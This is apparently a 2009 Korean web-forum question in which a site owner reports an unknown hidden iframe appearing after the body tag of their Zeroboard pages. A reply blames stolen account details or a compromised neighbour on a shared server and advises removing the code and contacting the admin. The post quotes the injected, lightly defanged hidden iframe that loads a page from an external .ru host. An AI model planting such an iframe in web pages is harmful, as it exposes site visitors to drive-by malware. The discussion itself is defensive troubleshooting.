묻고답하기
page_full_width" class="col-xs-12" |cond="$__Context->page_full_width">
스크립팅 공격?
2009.07.10 07:52
<ㅇiframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"><ㅇ/iframe>
제로보드 유저님 안녕하세요.
다름이 아니라 어제에 이어서 홈페이지 레이아웃이 전체적으로 밑으로 쏠리면서 공간이 생기는 현상이 생겨서 아침에 확인해 보았습니다.
그래서 보니까 못보던 iFrame 태그가 Body 태그 끝나는 지점에서 부터 있더라고여... 전 한번도 쓴적 없는 태그인데 저런 태그는 어디서 생성 됬나 알고 싶고, 스크립팅 공격인가 알고 싶습니다.
제 MSN입니다.
mango2007@live.com
이주영님이 FTP로 올린 파일의 경우 웹스크립트를 통해서 직접 코드가 변조되기는 어렵습니다.
(리눅스 서버일 경우)
이미 다른 경로로 이주영님의 계정 정보가 유출되었거나 혹은 같은 서버를 이용하는 다른 유저의 계정이 뚫려서 위와 같은 스크립트가 심겨지고 있는게 아닐까 싶습니다.
이 경우 서버 관리자에게 문의해서 저런 악성 코드를 심는 스크립트를 찾아서 없애야 하는 것이 맞구요 일단 저런 스크립트는 바로 바로 지우시는 것이 좋습니다.
공격 루트가 워낙 다양해서 서버 관리자가 잘 찾아서 처리해주기를 바라는 것이 좋을 듯 합니다.